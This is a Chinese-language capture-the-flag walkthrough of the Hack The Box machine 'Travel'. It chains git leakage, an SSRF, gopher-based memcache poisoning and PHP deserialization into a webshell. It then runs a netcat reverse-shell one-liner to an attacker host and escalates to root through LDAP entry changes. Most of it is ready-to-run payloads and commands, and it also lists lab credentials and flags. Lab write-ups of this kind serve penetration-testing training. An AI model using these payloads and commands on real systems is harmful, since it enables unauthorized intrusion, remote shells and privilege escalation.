[Meachines] [Hard] Travel Git+SSRF+memcache+TRP00F+LDIF-SSH特權升級
字数 955 2025-08-22 12:23:06
Travel.HTB 渗透测试完整教学文档
信息收集阶段
初始扫描
- 目标IP: 10.10.10.189
- 开放端口:
- 22/tcp: OpenSSH 8.2p1 Ubuntu 4
- 80/tcp: nginx 1.17.6 (http)
- 443/tcp: nginx 1.17.6 (https)
证书信息:
- 域名: www.travel.htb, blog.travel.htb, blog-dev.travel.htb
- 有效期: 2020-04-23 至 2030-04-21
主机文件配置
echo '10.10.10.189 travel.htb' >> /etc/hosts
子域名枚举
发现以下子域名:
- http://ssl.travel.htb
- http://blog.travel.htb
- http://blog-dev.travel.htb
Git信息泄露利用
Git仓库下载
使用GitDumper工具下载.git目录:
./dump.sh http://blog-dev.travel.htb/.git/ res
恢复Git仓库
cd res
git reset --hard
关键代码分析
发现rss_template.php文件,其中包含SSRF漏洞:
$url = $_SERVER['QUERY_STRING'];
if(strpos($url, "custom_feed_url") !== false){
$tmp = (explode("=", $url));
$url = end($tmp);
} else {
$url = "http://www.travel.htb/newsfeed/customfeed.xml";
}
$feed = get_feed($url);
SSRF与Memcache利用
Memcache缓存键识别
WordPress SimplePie类使用Memcache缓存RSS feed,缓存键格式:
md5(md5(feed_url) + ":spc")
计算示例:
echo -n "$(echo -n 'http://travel.htb/newsfeed/customfeed.xml' | md5sum | cut -d' ' -f1):spc" | md5sum
Gopher协议利用
使用Gopherus工具生成Memcache payload:
gopherus --exploit phpmemcache
尝试注入Memcache:
curl 'http://blog.travel.htb/awesome-rss/?custom_feed_url=gopher://127.0.0.1:11211/_%0d%0aset%20SpyD3r%204%200%2012%0d%0atest%20success%0d%0a'
发现被过滤,使用127.1绕过:
curl -s 'http://blog.travel.htb/awesome-rss/?custom_feed_url=gopher://127.1:11211/_%0d%0aset%20SpyD3r%204%200%2012%0d%0atest%20success%0d%0a'
PHP反序列化攻击
- 创建恶意序列化对象:
<?php
class TemplateHelper{
public $file;
public $data;
public function __construct() {
$this->file = 'shell.php';
$this->data = '<?php system($_GET["cmd"]); ?>';
}
}
$obj = new TemplateHelper();
echo serialize($obj);
?>
- 注入Memcache:
curl -s 'http://blog.travel.htb/awesome-rss/?custom_feed_url=gopher://127.1:11211/_%0d%0aset%20xct_c2a6e200369c218c55ee3bd085c37104%204%200%20102%0d%0aO:14:%22TemplateHelper%22:2:%7Bs:4:%22file%22%3Bs:9:%22shell.php%22%3Bs:4:%22data%22%3Bs:30:%22%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%20%3F%3E%22%3B%7D%0d%0a'
- 触发反序列化:
curl -s 'http://blog.travel.htb/awesome-rss/?custom_feed_url=http://10.10.16.24/customfeed.xml'
- 获取webshell:
http://blog.travel.htb/wp-content/themes/twentytwenty/logs/shell.php?cmd=whoami
- 反弹shell:
curl http://blog.travel.htb/wp-content/themes/twentytwenty/logs/shell.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%2010.10.16.24%20443%20%3E%2Ftmp%2Ff
权限提升至lynik-admin
WordPress凭证获取
找到WordPress凭证:
- 用户名: wp
- 密码: fiFtDDV9LYe8Ti
使用hashcat破解:
hashcat -m 400 hashes.txt rockyou.txt --force
获得lynik-admin凭证:
- 用户名: lynik-admin
- 密码: 1stepcloser
获取user flag:
c721ef5c8698054199131dea512ed500
TRP00F提权
使用TRP00F工具进行TCP反射端口转发:
python trp00f.py --lhost 10.10.16.24 --lport 10022 --rhost 10.10.16.24 --rport 443 --http 10091
LDAP权限提升
LDAP信息收集
检查配置文件:
cat .ldaprc
cat .viminfo
验证LDAP访问:
ldapsearch -x -w Theroadlesstraveled
检查SSH配置:
cat /etc/ssh/sshd_config | grep -v '^#' | grep .
LDAP修改攻击
- 创建eugene用户并添加SSH公钥:
dn: uid=eugene,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKh5j38dxYGBQEgZCAb6+6mzvGnTXX/cw/YqIG7bU2NL map@map
执行修改:
ldapadd -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled -f /tmp/eugene.ldif
- 修改用户组:
dn: uid=eugene,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
replace: gidNumber
gidNumber: 27
执行修改:
ldapadd -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled -f /tmp/eugene_gid.ldif
- 设置用户密码:
dn: uid=eugene,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
replace: userPassword
userPassword: password123
执行修改:
ldapadd -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled -f /tmp/eugene_pass.ldif
获取root权限
sudo su
获取root flag:
9e19cd0d257e88a10da5e8c0c3a92bac1